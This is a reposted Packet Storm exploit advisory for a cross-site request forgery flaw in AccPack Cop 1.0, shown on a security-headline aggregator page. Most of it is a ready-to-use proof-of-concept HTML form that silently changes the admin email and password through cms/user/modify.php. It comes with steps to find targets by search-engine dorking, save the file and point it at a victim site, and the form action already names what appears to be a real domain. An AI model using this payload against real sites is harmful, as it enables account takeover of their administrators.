Security
Headlines
HeadlinesLatestCVEs

Headline

AccPack Cop 1.0 Cross Site Request Forgery

AccPack Cop version 1.0 suffers from a cross site request forgery vulnerability.

Packet Storm
#csrf#vulnerability#web#windows#google#php#auth#firefox

=============================================================================================================================================
| # Title : AccPack Cop v1.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |
| # Vendor : http://webpay.com.np/#Product |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following HTML code modifies the admin information.

[+] Go to the line 5. Set the target site link Save changes and apply .

[+] infected file : cms/user/modify.php.

[+] http://127.0.0.1/q7.3/cms/user/modify.php.

[+] save code as poc.html

[+] payload :

</head>
<body>
<div class="container">
<div class="text-center" style="padding: 5px"><h3>User Edit</h3></div>
<form action="https://tssclahanorgnp/cms/user/modify.php" method="POST" enctype="multipart/form-data">
<div hidden="true">
<input type="text" name="id" id="id" value="1">
</div>
<div>
<label for=’email’>Email</label><input type="text" class="form-control" name=’email’ id=’email’ value="[email protected]">
</div>
<div>
<label for=’password’>Password</label><input type="text" class="form-control" name=’password’ id=’password’ type=’password’ value="123456">
</div>
<tr>
<div>
<label for=’status’>Status</label>
<input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label>
<input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label>

           </div>     
   <div style='height:80'>  
    <input type='submit' value='Submit'><input type='reset' Value='Reset'>  
   </div>  
</form>  

</div>

</body>
</html>

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution